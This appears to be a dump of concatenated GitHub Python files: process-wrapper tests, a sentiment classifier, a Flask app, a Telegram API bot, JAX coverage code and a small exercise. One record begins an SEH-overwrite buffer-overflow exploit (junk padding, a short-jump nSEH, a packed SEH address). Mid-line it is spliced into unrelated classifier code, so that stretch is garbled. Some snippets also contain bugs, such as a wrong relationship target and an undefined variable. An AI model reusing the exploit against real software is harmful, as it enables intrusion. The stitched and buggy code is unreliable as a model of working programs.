processwrapper import ProcessWrapper\n\n\nclass TestProcessWrapper:\n\n def setup_method(self, method):\n self.process_wrapper = ProcessWrapper(ProcessUtilityMock())\n self.process_utility = self.process_wrapper.process_utility\n self.sample_command = 'background_process run'\n self.SampleException = BaseException\n\n def teardown_method(self, method):\n self.process_utility.kill_process_group_mock.assert_any_call(ANY)\n\n def test__process_wrapper__kills_parent_and_child_processes_on_exit(self):\n with self.process_wrapper.run_process(self.sample_command):\n self.process_utility.request_new_process_mock.assert_any_call(\n self.sample_command)\n\n def test__process_wrapper__handles_in_context_exceptions(self):\n with raises(self.SampleException):\n with self.process_wrapper.run_process(self.sample_command):\n raise self.SampleException\n\n def test__process_wrapper__does_nothing_with_already_killed_procs(self):\n self.process_utility.kill_process_group_mock.side_effect = \\\n self.process_utility.ProcessDoesNotExist\n\n try:\n with self.process_wrapper.run_process(self.sample_command):\n pass\n except:\n fail_msg = 'Exception raised when it should not'\n raise AssertionError(fail_msg)\n\n def test__process_wrapper__raises_all_other_exceptions(self):\n self.process_utility.kill_process_group_mock.side_effect = \\\n self.SampleException\n\n with raises(self.SampleException):\n with self.process_wrapper.run_process(self.sample_command):\n pass\n\n\ndef test__sample_usage__works():\n import time\n from psutil import Process\n from processwrapper import run_process\n\n with run_process(\n 'python bin/sample_background_process.py parent') as process:\n sample_process = Process(process.pid)\n assert sample_process.is_running()\n time.sleep(2)\n\n assert not sample_process.is_running()\n","repo_name":"marc-lopez/process-wrapper","sub_path":"ProcessWrapper/processwrapper/tests/test_process_wrapper.py","file_name":"test_process_wrapper.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39122632286","text":"import base64, struct\n\nhead = \"A\" * 1024\nnseh = \"\\x41\\x41\\xeb\\x0c\" # filler 0x41, 0xeb 0x0c = jmp few bytes only\nseh = struct.pack(\" List[int]:\n \"\"\"\n Extract features from a sentence represented as a list of words. Includes a flag add_to_indexer to\n :param sentence: words in the example to featurize\n :param add_to_indexer: True if we should grow the dimensionality of the featurizer if new features are encountered.\n At test time, any unseen features should be discarded, but at train time, we probably want to keep growing it.\n :return: A feature vector. We suggest using a Counter[int], which can encode a sparse feature vector (only\n a few indices have nonzero value) in essentially the same way as a map. However, you can use whatever data\n structure you prefer, since this does not interact with the framework code.\n \"\"\"\n raise Exception(\"Don't call me, call my subclasses\")\n \nclass UnigramFeatureExtractor(FeatureExtractor):\n \"\"\"\n Extracts unigram bag-of-words features from a sentence. 
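# --- Hedged POSIX-only sketch (hypothetical helper, not the package's actual
# implementation) of the behaviour the tests above exercise: run a command in
# its own process group and kill the whole group on context exit.
import os, signal, subprocess
from contextlib import contextmanager

@contextmanager
def _run_process(command):
    proc = subprocess.Popen(command, shell=True, preexec_fn=os.setsid)
    try:
        yield proc
    finally:
        try:
            os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
        except ProcessLookupError:
            pass  # group already gone -- mirrors the ProcessDoesNotExist branch

with _run_process('sleep 30') as p:
    print('child pid:', p.pid)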
It's up to you to decide how you want to handle counts\n and any additional preprocessing you want to do.\n \"\"\"\n #you could add new properties\n def __init__(self, indexer: Indexer):\n #FeatureExtractor.__init__(self)\n self.indexer = indexer\n\n def get_indexer(self): \n return self.indexer\n \n def add_features(self, sentence: List[str]):\n words = []\n for word in sentence: \n word = word.lower()\n if word not in words: \n self.indexer.add_and_get_index(word)\n\n def extract_features(self, sentence: List[str], add_to_indexer: bool= False) -> List[int]: \n if add_to_indexer: \n self.add_features(sentence)\n count = Counter()\n for word in sentence: \n word = word.lower()\n if self.indexer.contains(word): \n index = self.indexer.index_of(word)\n count.update([index]) \n \n return list(count.items())\n \n def vocab_size(self): \n return len(self.indexer)\n\n\nclass BigramFeatureExtractor(FeatureExtractor):\n \"\"\"\n Bigram feature extractor analogous to the unigram one.\n \"\"\"\n def __init__(self, indexer: Indexer):\n self.indexer = indexer\n \n def get_indexer(self): \n return self.indexer\n\n def add_features(self, sentence: List[str]): \n for i in range(len(sentence)-1): \n word_pair = sentence[i].lower() + sentence[i+1].lower()\n self.indexer.add_and_get_index(word_pair)\n\n def extract_features(self, sentence:List[str], add_to_indexer: bool=False)-> List[int]: \n if add_to_indexer: \n self.add_features(sentence)\n count = Counter()\n words = []\n # for word in sentence: \n # if word not in string.punctuation: \n # words.append(word) \n\n for i in range(len(sentence)-1): \n word_pair = sentence[i].lower() + sentence[i+1].lower()\n \n if self.indexer.contains(word_pair): \n index = self.indexer.index_of(word_pair)\n count.update([index])\n\n return list(count.items())\n \n def vocab_size(self): \n return len(self.indexer)\n\nclass BetterFeatureExtractor(FeatureExtractor):\n \"\"\"\n Better feature extractor...try whatever you can think of!\n \"\"\"\n def __init__(self, indexer: Indexer):\n #raise Exception(\"Must be implemented\")\n #FeatureExtractor.__init__(self)\n self.indexer = indexer\n \n def get_indexer(self): \n return self.indexer\n \n def add_features(self, sentence: List[str]): \n #remove punctation and stop words\n words = []\n stop_words = set(stopwords.words('english')) \n for word in sentence: \n if word not in string.punctuation: \n word = word.lower()\n words.append(word)\n \n non_stop_words = [w for w in words if not w in stop_words]\n for feature in non_stop_words: \n self.indexer.add_and_get_index(feature)\n \n def extract_features(self, sentence: List[str], add_to_indexer: bool= False)-> List[int]: \n count = Counter()\n if add_to_indexer: \n self.add_features(sentence)\n for word in sentence: \n word = word.lower()\n if self.indexer.contains(word): \n index = self.indexer.index_of(word)\n count.update([index]) \n \n return list(count.items())\n\n def vocab_size(self): \n return len(self.indexer)\n\nclass SentimentClassifier(object):\n \"\"\"\n Sentiment classifier base type\n \"\"\"\n def predict(self, sentence: List[str]) -> int:\n \"\"\"\n :param sentence: words (List[str]) in the sentence to classify\n :return: Either 0 for negative class or 1 for positive class\n \"\"\"\n raise Exception(\"Don't call me, call my subclasses\")\n\n\nclass TrivialSentimentClassifier(SentimentClassifier):\n \"\"\"\n Sentiment classifier that always predicts the positive class.\n \"\"\"\n def predict(self, sentence: List[str]) -> int:\n return 1\n\n\nclass 
PerceptronClassifier(SentimentClassifier):\n \"\"\"\n Implement this class -- you should at least have init() and implement the predict method from the SentimentClassifier\n superclass. Hint: you'll probably need this class to wrap both the weight vector and featurizer -- feel free to\n modify the constructor to pass these in.\n \"\"\"\n def __init__(self, feat_extractor):\n #raise Exception(\"Must be implemented\")\n SentimentClassifier.__init__(self)\n self.feat_extractor = feat_extractor\n self.indexer = self.feat_extractor.get_indexer()\n self.words_size = self.feat_extractor.vocab_size()\n self.weights = np.zeros((self.words_size,))\n self.feature_dic = {}\n \n def get_features(self, sentence: List[str]) -> List[int]: \n ex_sent = ''.join(sentence)\n if ex_sent not in self.feature_dic: \n feature = self.feat_extractor.extract_features(sentence)\n self.feature_dic[ex_sent] = feature\n else: \n feature = self.feature_dic[ex_sent]\n\n return feature\n\n def predict(self, sentence: List[str]) -> int: \n feature = self.get_features(sentence)\n weight_multi_feature = 0\n for key,val in feature:\n weight_multi_feature += self.weights[key] * val\n y_pre = 1 if weight_multi_feature >=0.5 else 0\n \n return y_pre\n\n def update_weight(self, sentence, y, y_pre, alpha): \n features = self.get_features(sentence)\n for k, val in features: \n self.weights[k] = self.weights[k] - (y_pre - y) * alpha * val\n\n#Calculate sigmoid\ndef sigmoid(x):\n result = 1./(1. + np.exp(-x))\n return result\n\nclass LogisticRegressionClassifier(SentimentClassifier):\n \"\"\"\n Implement this class -- you should at least have init() and implement the predict method from the SentimentClassifier\n superclass. Hint: you'll probably need this class to wrap both the weight vector and featurizer -- feel free to\n modify the constructor to pass these in.\n \"\"\"\n def __init__(self, feat_extractor):\n #raise Exception(\"Must be implemented\")\n SentimentClassifier.__init__(self)\n self.feat_extractor = feat_extractor\n self.indexer = self.feat_extractor.get_indexer()\n self.words_size = self.feat_extractor.vocab_size()\n self.weights = np.zeros((self.words_size,))\n self.feature_dic = {}\n\n def get_features(self, sentence: List[str]) -> List[int]:\n ex_sent = ''.join(sentence)\n if ex_sent not in self.feature_dic: \n feature = self.feat_extractor.extract_features(sentence)\n self.feature_dic[ex_sent] = feature\n else: \n feature = self.feature_dic[ex_sent]\n\n return feature\n\n def predict(self, sentence: List[str]) -> int: \n features = self.get_features(sentence)\n weight_multi_feature = 0 \n for k , val in features: \n weight_multi_feature += self.weights[k] * val\n\n result = sigmoid(weight_multi_feature)\n y_pre = 1 if result>0.5 else 0\n\n return y_pre\n\n def update_weight(self, sentence, y, y_pre, alpha): \n features = self.get_features(sentence)\n\n weight_multi_feature = 0\n for k ,val in features:\n weight_multi_feature += self.weights[k] * val\n \n result = sigmoid(weight_multi_feature)\n for k , val in features:\n self.weights[k] = self.weights[k] - alpha * ((result - y)* val)\n #self.weights[k] = self.weights[k] - alpha * (-y * val * (1-result) + (1-result) * val * result)\n\n def loss(self, train_exs): \n sum_loss = 0\n for ex in train_exs: \n x = ex.words\n y = ex.label\n feature = self.get_features(ex.words) \n \n weight_multi_feature = 0\n for k , val in feature: \n weight_multi_feature += self.weights[k] * val\n \n result = sigmoid(weight_multi_feature)\n loss = -y * np.log(result) - (1-y)* 
np.log(1-result)\n sum_loss += loss\n sum_loss = sum_loss / float(len(train_exs))\n\n return sum_loss\n\n\ndef train_perceptron(train_exs: List[SentimentExample], feat_extractor: FeatureExtractor) -> PerceptronClassifier:\n \"\"\"\n Train a classifier with the perceptron.\n :param train_exs: training set, List of SentimentExample objects\n :param feat_extractor: feature extractor to use\n :return: trained PerceptronClassifier model\n \"\"\"\n #raise Exception(\"Must be implemented\")\n #extract all the features first: \n for ex in train_exs: \n feat_extractor.add_features(ex.words)\n\n model = PerceptronClassifier(feat_extractor)\n epochs = 20\n alpha = 1\n for i in tqdm(range(epochs)): \n random.shuffle(train_exs)\n data_size = int(len(train_exs))\n data_ex = train_exs[:data_size]\n\n for ex in data_ex: \n y = ex.label\n y_pre = model.predict(ex.words)\n model.update_weight(ex.words, y, y_pre, alpha)\n \n alpha = alpha * 0.9\n \n return model\n\ndef train_logistic_regression(train_exs: List[SentimentExample], feat_extractor: FeatureExtractor) -> LogisticRegressionClassifier:\n \"\"\"\n Train a logistic regression model.\n :param train_exs: training set, List of SentimentExample objects\n :param feat_extractor: feature extractor to use\n :return: trained LogisticRegressionClassifier model\n \"\"\"\n #raise Exception(\"Must be implemented\")\n for ex in train_exs: \n feat_extractor.add_features(ex.words)\n\n model = LogisticRegressionClassifier(feat_extractor)\n epochs = 30\n alpha = 0.5\n \n for i in tqdm(range(epochs)): \n \"\"\" if(isinstance(feat_extractor, BetterFeatureExtractor)): \n alpha = alpha / (i+1) \"\"\"\n random.shuffle(train_exs)\n data_size = int(len(train_exs))\n data_exs = train_exs[:data_size]\n\n for ex in data_exs: \n y = ex.label\n y_pre = model.predict(ex.words)\n model.update_weight(ex.words, y, y_pre, alpha)\n \n return model\n\n#do not modify\ndef train_model(args, train_exs: List[SentimentExample], dev_exs: List[SentimentExample]) -> SentimentClassifier:\n \"\"\"\n Main entry point for your modifications. Trains and returns one of several models depending on the args\n passed in from the main method. You may modify this function, but probably will not need to.\n :param args: args bundle from sentiment_classifier.py\n :param train_exs: training set, List of SentimentExample objects\n :param dev_exs: dev set, List of SentimentExample objects. 
You can use this for validation throughout the training\n process, but you should *not* directly train on this data.\n :return: trained SentimentClassifier model, of whichever type is specified\n \"\"\"\n # Initialize feature extractor\n if args.model == \"TRIVIAL\":\n feat_extractor = None\n elif args.feats == \"UNIGRAM\":\n # Add additional preprocessing code here\n feat_extractor = UnigramFeatureExtractor(Indexer())\n elif args.feats == \"BIGRAM\":\n # Add additional preprocessing code here\n feat_extractor = BigramFeatureExtractor(Indexer())\n elif args.feats == \"BETTER\":\n # Add additional preprocessing code here\n feat_extractor = BetterFeatureExtractor(Indexer())\n else:\n raise Exception(\"Pass in UNIGRAM, BIGRAM, or BETTER to run the appropriate system\")\n\n # Train the model\n if args.model == \"TRIVIAL\":\n model = TrivialSentimentClassifier()\n elif args.model == \"PERCEPTRON\":\n model = train_perceptron(train_exs, feat_extractor)\n elif args.model == \"LR\":\n model = train_logistic_regression(train_exs, feat_extractor)\n else:\n raise Exception(\"Pass in TRIVIAL, PERCEPTRON, or LR to run the appropriate system\")\n return model","repo_name":"lyxmegan/Natural_Language_Processing","sub_path":"a1-distrib/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20250232547","text":"# Receber altura e sexo e mostrar o peso \"ideal\"\nalt = float(input('Digite sua altura: '))\nsexo = input('Digite seu sexo: (m/f) ')\n\nif sexo == 'm':\n peso = (72.7 * alt) - 58\n print(f'O peso \"ideal\" é {peso}Kg.')\nelif sexo == 'f':\n peso = (62.1 * alt) - 44.7\n print(f'O peso \"ideal\" é {peso}Kg.')\nelse:\n print('Valores inválidos!')\n","repo_name":"leandro-alvesc/estudos_python","sub_path":"guppe/exercicios/secao_05/ex010.py","file_name":"ex010.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37968893976","text":"from flask import Flask, render_template, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\n\n# from database_setup import Team, Venue, Base\n\nfrom datetime import datetime\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///pinball-league.db'\ndb = SQLAlchemy(app)\n\nclass Venue(db.Model):\n __tablename__ = 'venue'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), nullable=False)\n address = db.Column(db.String(250), nullable=False)\n city = db.Column(db.String(250), nullable=False)\n state = db.Column(db.String(250), nullable=False)\n home_team = db.relationship('team', backref='venue', uselist=False)\n\nclass Team(db.Model):\n __tablename__ = 'team'\n \n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), nullable=False)\n home_venue_id = db.Column(db.Integer, db.ForeignKey('venue.id'), unique=True)\n\n# Route to Home Page\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n# Route to Get Teams and Create new Team\n@app.route(\"/teams\", methods=['GET', 'POST'])\ndef teams():\n if request.method == 'POST':\n team_name = request.form['name']\n new_team = Team(name=team_name)\n db.session.add(new_team)\n db.session.commit()\n return redirect('teams')\n else:\n teams = db.session.query(Team).all()\n return render_template(\"teams.html\", teams=teams)\n\n@app.route(\"/teams/delete/\")\ndef delete_team(team_id):\n team = 
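# --- Toy numeric check (illustrative values) of the sparse logistic update in
# LogisticRegressionClassifier.update_weight above:
# w_k <- w_k - alpha * (sigmoid(w . x) - y) * x_k over the (index, count) pairs.
import numpy as np

w = np.zeros(4)
features = [(0, 2), (3, 1)]  # sparse (feature index, count) pairs
y, alpha = 1, 0.5
z = sum(w[k] * v for k, v in features)
result = 1.0 / (1.0 + np.exp(-z))  # sigmoid(0) = 0.5
for k, v in features:
    w[k] = w[k] - alpha * (result - y) * v
print(w)  # [0.5  0.   0.   0.25] -- weights move toward the y = 1 label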
db.session.query(Team).filter_by(id=team_id).one()\n db.session.delete(team)\n db.session.commit()\n return redirect('/teams')\n\n# Route to Get Venue and Create new Venue\n@app.route(\"/venues\", methods=['GET', 'POST'])\ndef venues():\n if request.method == 'POST':\n venue_name = request.form['name']\n venue_address = request.form['address']\n venue_city = request.form['city']\n venue_state = request.form['state']\n new_venue = Venue(name=venue_name, address=venue_address, city=venue_city, state=venue_state)\n db.session.add(new_venue)\n db.session.commit()\n return redirect('venues')\n else:\n venues = db.session.query(Venue).all()\n return render_template(\"venues.html\", venues=venues)\n\n@app.route(\"/venues/delete/\")\ndef delete_venue(venue_id):\n venue = db.session.query(Venue).filter_by(id=venue_id).one()\n db.session.delete(venue)\n db.session.commit()\n return redirect('/venues')\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"ylijokic/Django_And_Flask_Projects","sub_path":"Pinball_League_App/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2209903527","text":"import logging\nimport os\nimport requests\nimport re\nimport json\nimport praw\nfrom datetime import datetime, timedelta\nfrom bottle import route, template, run\nfrom twitter import *\nfrom newsapi.newsapi_client import NewsApiClient\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackQueryHandler, CallbackContext\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, Update\n\nPORT = int(os.environ.get('PORT', 5000))\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\nTOKEN = 'insert telegram token'\n\n# Define a few command handlers. These usually take the two arguments update and\n# context. Error handlers also receive the raised TelegramError object in error.\ndef start(update, context):\n \"\"\"Send a message when the command /start is issued.\"\"\"\n update.message.reply_text('Welcome user!' 
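# --- Likely fix as a standalone SQLAlchemy sketch (venue/team names are made
# up; untested against the app): relationship() takes the mapped *class* name,
# so Venue.home_team above should reference 'Team', not the tablename 'team'.
from sqlalchemy import Column, ForeignKey, Integer, String, create_engine
from sqlalchemy.orm import Session, declarative_base, relationship

Base = declarative_base()

class Venue(Base):
    __tablename__ = 'venue'
    id = Column(Integer, primary_key=True)
    name = Column(String(250), nullable=False)
    home_team = relationship('Team', back_populates='home_venue', uselist=False)

class Team(Base):
    __tablename__ = 'team'
    id = Column(Integer, primary_key=True)
    name = Column(String(250), nullable=False)
    home_venue_id = Column(Integer, ForeignKey('venue.id'), unique=True)
    home_venue = relationship('Venue', back_populates='home_team')

engine = create_engine('sqlite://')
Base.metadata.create_all(engine)
with Session(engine) as s:
    s.add(Venue(name='Main Street Arcade', home_team=Team(name='Tilted')))
    s.commit()
    assert s.query(Venue).one().home_team.name == 'Tilted'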
+ '\\U0001F44B' + '\\n\\n' +\n 'For a little bit of motivation in life ' + '\\U0001F973' + ', type /motivate\\n' +\n 'For a random dog picture ' + '\\U0001F436' + ', type /dog\\n' +\n 'For a random reddit meme ' + '\\U0001F92A' + ', type /memes\\n' +\n 'For a random unsplash wallpaper ' + '\\U0001F5BC' + ', type /wallpaper\\n' +\n 'For current Singapore weather ' + '\\U0001F324' + ', type /weather\\n' +\n 'For latest tweets in Singapore ' + '\\U0001F4AC' + ', type /tweets\\n\\n' +\n 'For SG latest news, choose from the following\\n' +\n 'COVID19 ' + '\\U0001F9A0' + ' ---> /covid \\n' +\n 'Business ' + '\\U0001F4BC' + ' ---> /business \\n' +\n 'Entertainment ' + '\\U0001F38A' + ' ---> /entertainment \\n' +\n 'Technology ' + '\\U0001F4F1' + ' ---> /technology \\n' +\n 'Sports ' + '\\U0001F93E' + ' ---> /sports \\n\\n' +\n 'Bot creation tutorial ' + '\\U0001F9D0' + ' ---> /tutorial')\n sheet_db.append_row([update.message.from_user.username, (datetime.now()+ timedelta(hours=8)).strftime(\"%d/%m/%Y %H:%M:%S\"), \"start\"])\n\n# motivational quote\ndef motivate(update, context):\n quote = requests.request(url='https://api.quotable.io/random',method='get')\n update.message.reply_text(quote.json()['content'])\n\n# dog pics\ndef dog(update, context):\n contents = requests.get('https://random.dog/woof.json').json()\n dog_pic = contents['url']\n update.message.reply_text(dog_pic)\n \n# unsplash wallpaper\ndef wallpaper(update, context):\n url = 'insert unsplash token'\n response = requests.get(url)\n wall_pic = response.json()['urls']['regular']\n update.message.reply_text(wall_pic)\n\n# news\nnewsapi = NewsApiClient(api_key='insert newsapi key')\nbusiness_news = newsapi.get_top_headlines(category='business', language='en', country='sg', page_size=3)\ndef business(update, context):\n business1 = list(business_news.values())[2][0]['title'] + '\\n\\n' + list(business_news.values())[2][0]['url']\n business2 = list(business_news.values())[2][1]['title'] + '\\n\\n' + list(business_news.values())[2][1]['url']\n business3 = list(business_news.values())[2][2]['title'] + '\\n\\n' + list(business_news.values())[2][2]['url']\n update.message.reply_text(business1)\n update.message.reply_text(business2)\n update.message.reply_text(business3)\n \nenter_news = newsapi.get_top_headlines(category='entertainment', language='en', country='sg', page_size=3)\ndef entertainment(update, context):\n entertainment1 = list(enter_news.values())[2][0]['title'] + '\\n\\n' + list(enter_news.values())[2][0]['url']\n entertainment2 = list(enter_news.values())[2][1]['title'] + '\\n\\n' + list(enter_news.values())[2][1]['url']\n entertainment3 = list(enter_news.values())[2][2]['title'] + '\\n\\n' + list(enter_news.values())[2][2]['url']\n update.message.reply_text(entertainment1)\n update.message.reply_text(entertainment2)\n update.message.reply_text(entertainment3)\n \ntech_news = newsapi.get_top_headlines(category='technology', language='en', country='sg', page_size=3)\ndef technology(update, context):\n tech1 = list(tech_news.values())[2][0]['title'] + '\\n\\n' + list(tech_news.values())[2][0]['url']\n tech2 = list(tech_news.values())[2][1]['title'] + '\\n\\n' + list(tech_news.values())[2][1]['url']\n tech3 = list(tech_news.values())[2][2]['title'] + '\\n\\n' + list(tech_news.values())[2][2]['url']\n update.message.reply_text(tech1)\n update.message.reply_text(tech2)\n update.message.reply_text(tech3)\n \nsports_news = newsapi.get_top_headlines(category='sports', language='en', country='sg', page_size=3)\ndef sports(update, 
context):\n sports1 = list(sports_news.values())[2][0]['title'] + '\\n\\n' + list(sports_news.values())[2][0]['url']\n sports2 = list(sports_news.values())[2][1]['title'] + '\\n\\n' + list(sports_news.values())[2][1]['url']\n sports3 = list(sports_news.values())[2][2]['title'] + '\\n\\n' + list(sports_news.values())[2][2]['url']\n update.message.reply_text(sports1)\n update.message.reply_text(sports2)\n update.message.reply_text(sports3)\n \ncovid_news = newsapi.get_top_headlines(q='covid', language='en', country='sg', page_size=3)\ndef covid(update, context):\n covid1 = list(covid_news.values())[2][0]['title'] + '\\n\\n' + list(covid_news.values())[2][0]['url']\n covid2 = list(covid_news.values())[2][1]['title'] + '\\n\\n' + list(covid_news.values())[2][1]['url']\n covid3 = list(covid_news.values())[2][2]['title'] + '\\n\\n' + list(covid_news.values())[2][2]['url']\n update.message.reply_text(covid1)\n update.message.reply_text(covid2)\n update.message.reply_text(covid3)\n\n# weather\napi_key = \"insert weather api\"\nbase_url = \"http://api.openweathermap.org/data/2.5/weather?\"\ncomplete_url = base_url + \"appid=\" + api_key + \"&q=\" + \"singapore\" \nresponse = requests.get(complete_url) \nx = response.json() \ncurrent_temperature = x['main']['temp']-273.15\nfeels_like = x['main']['feels_like']-273.15\nweather_description = x['weather'][0]['description']\ndef weather(update, context):\n weather_stats = \"\\U0001F324 Singapore Weather \\U0001F327\" + \"\\n\\nWeather Description = \" + str(weather_description) + \\\n \"\\nCurrent Temperature (in degree celsius) = \" + str(round(current_temperature,1)) + \\\n \"\\nFeels like (in degree celsius) = \" + str(round(feels_like,1))\n update.message.reply_text(weather_stats) \n\n# memes\ndef memes(update, context):\n reddit = praw.Reddit(client_id='insert reddit client id',\n client_secret='insert reddit client secret key', \n password='insert reddit api password',\n user_agent='insert reddit api user_agent',\n username='insert reddit api username')\n subreddit = reddit.subreddit(\"memes\")\n meme = subreddit.random()\n update.message.reply_text(meme.url)\n\n# twitter \ndef tweets(update, context):\n update.message.reply_text(text='What Twitter topics are you interested in?')\ndef tweets_reply(update, context):\n user_input = update.message.text\n consumer_key= 'insert twitter consumer key'\n consumer_secret= 'insert twitter consumer secret'\n access_token= 'insert twitter access token'\n access_token_secret= 'insert twitter access secret'\n twitter = Twitter(auth = OAuth(access_token, access_token_secret, consumer_key, consumer_secret))\n latitude = 1.3521 \n longitude = 103.8198 \n max_range = 20\n query_search = user_input + \"-filter:retweets\"\n query = twitter.search.tweets(q = query_search, geocode = \"%f,%f,%dkm\" % (latitude, longitude, max_range), lang='en',count=3)\n answer = f'\\U0001F4F1 Showing latest 3 tweets in SG for: {user_input}'\n update.message.reply_text(answer)\n update.message.reply_text(query['statuses'][0]['text'])\n update.message.reply_text(query['statuses'][1]['text'])\n update.message.reply_text(query['statuses'][2]['text'])\n \n# bot creation tutorial\ndef tutorial(update, context):\n update.message.reply_text('https://kierantan.medium.com/building-a-one-stop-api-caller-on-telegram-with-python-f8ff845d5985')\n \ndef error(update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n\ndef main():\n \"\"\"Start the bot.\"\"\"\n # Create 
the Updater and pass it your bot's token.\n # Make sure to set use_context=True to use the new context based callbacks\n # Post version 12 this will no longer be necessary\n updater = Updater(TOKEN, use_context=True)\n\n # Get the dispatcher to register handlers\n dp = updater.dispatcher\n\n # on different commands - answer in Telegram\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(CommandHandler(\"motivate\", motivate))\n dp.add_handler(CommandHandler(\"dog\", dog))\n dp.add_handler(CommandHandler(\"business\", business))\n dp.add_handler(CommandHandler(\"entertainment\", entertainment))\n dp.add_handler(CommandHandler(\"technology\", technology))\n dp.add_handler(CommandHandler(\"sports\", sports))\n dp.add_handler(CommandHandler(\"covid\", covid))\n dp.add_handler(CommandHandler(\"wallpaper\", wallpaper))\n dp.add_handler(CommandHandler(\"weather\", weather))\n dp.add_handler(CommandHandler(\"memes\", memes))\n dp.add_handler(CommandHandler(\"tutorial\", tutorial))\n dp.add_handler(CommandHandler(\"tweets\", tweets))\n dp.add_handler(MessageHandler(Filters.text, tweets_reply))\n\n # log all errors\n dp.add_error_handler(error)\n\n # Start the Bot\n updater.start_webhook(listen=\"0.0.0.0\", port=int(PORT), url_path=TOKEN)\n updater.bot.setWebhook('insert heroku app name' + TOKEN)\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n\nif __name__ == '__main__':\n main()","repo_name":"kahwangt/telegram_bot","sub_path":"telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":9979,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13515440948","text":"import numpy as np\nfrom jax import vmap, jit, grad\nimport jax.numpy as jnp\nfrom jax.lax import scan\nimport copy\n# from jax.config import config; config.update(\"jax_enable_x64\", True)\nfrom functools import partial\nstep_size=50\ntempvar=1\ntemptheta=0\nrob_vel = 0.8\n\ndef wrapToPi(x):\n\t# print(\"x!!!!!!!!!!!: \", x)\t\n\tif x > 3.14:\n\t\tx = x - 2*3.14\n\telif x < -3.14:\n\t\tx = x + 2*3.14\n\treturn x\n\ndef fDyn(x, u): # dynamics of the robot - point mass\n\txnew = x + jnp.array([jnp.tanh(u[0]),jnp.tanh(u[0]),10*u[1]])\n\t# xnew = x + jnp.array([0.8,0.8,10*u[1]])\n\treturn xnew, x\n\ndef fDiffDrive(x0, u):\n\t\"\"\"\n\tx0 = (x,y,theta)\n\tu = (v,w)\n\n\tx0 = (x,y,theta,v)\n\tu = (w,a)\n\t\"\"\"\n\tu = jnp.tanh(u) #Limit the maximum velocity to 1\n\tx = x0 + jnp.array([jnp.cos(x0[2])*0.02, jnp.sin(x0[2])*0.02, 0.8*u[0]])\n\n\treturn x, x0\n\ndef get_hk(k): # normalizing factor for basis function\n\t_hk = jnp.array((2. * k + np.sin(2 * k))/(4. 
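# --- Side note as a sketch (same placeholder key convention as above):
# OpenWeatherMap also accepts units=metric and then returns Celsius directly,
# avoiding the manual -273.15 Kelvin conversion used in the weather handler.
import requests

params = {'q': 'singapore', 'appid': 'insert weather api', 'units': 'metric'}
resp = requests.get('http://api.openweathermap.org/data/2.5/weather', params=params)
if resp.ok:
    main = resp.json()['main']
    print(main['temp'], main['feels_like'])  # already in degrees Celsius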
* k))\n\t_hk = _hk.at[np.isnan(_hk)].set(1.)\t\n\treturn np.sqrt(np.prod(_hk))\n\ndef fk(x, k): # basis function\n return jnp.prod(jnp.cos(x*k))\n\n# def GetTrajXY(u, x0):\n# \t\"\"\"\n# \t\"\"\"\n\n# \txf, tr0 = scan(fDiffDrive, x0, u)\n# \ttemptheta=tr0[tempvar*10][2]\n\t\n# \ttr = tr0[:,0:2] # take the (x,y) part of all points\n# \t# print(len(tr), \" type of tr\")\n# \treturn xf, tr\ndef GetTrajXY(u, x0):\n\t\"\"\"\n\t\"\"\"\n\n\txf, tr0 = scan(fDiffDrive, x0, u)\n\tsome=tr0[step_size-1][2]\n\n\ttr = tr0[:,0:2] # take the (x,y) part of all points\n\treturn xf, tr,some\n\ndef GetTrajXYTheta(u,x0):\n\txf, tr = scan(fDiffDrive, x0, u)\n\treturn xf, tr\n\n\nclass ErgCalc(object):\n\t\"\"\"\n\tmodified from Ian's Ergodic Coverage code base.\n\t\"\"\"\n\tdef __init__(self, pdf, n_agents, nA, n_fourier, nPix):\n\t\t# print(\"Number of agents: \", n_agents)\n\t\tself.n_agents = n_agents\n\t\tself.nPix = nPix\n\t\tself.nA = nA\n\t\t# aux func\n\t\tself.fk_vmap = lambda _x, _k: vmap(fk, in_axes=(0,None))(_x, _k)\n\t\tself.x0=jnp.array(())\n\n\t\t# fourier indices\n\t\tk1, k2 = jnp.meshgrid(*[jnp.arange(0, n_fourier, step=1)]*2)\n\t\tk = jnp.stack([k1.ravel(), k2.ravel()]).T\n\t\tself.k = jnp.pi*k\n\n\t\t# lambda, the weights of different bands.\n\t\tself.lamk = (1.+jnp.linalg.norm(self.k/jnp.pi,axis=1)**2)**(-4./2.)\n\n\t\t# the normalization factor\n\t\thk = []\n\t\tfor ki in k:\n\t\t\thk.append(get_hk(ki))\n\t\tself.hk = jnp.array(hk)\n\n\t\t# compute phik\n\t\tif isinstance(nPix,int) == True:\n\t\t\tX,Y = jnp.meshgrid(*[jnp.linspace(0,1,num=self.nPix)]*2)\n\t\telse: #Using this when using a window around the agent and the window is not a square\n\t\t\tX,Y = 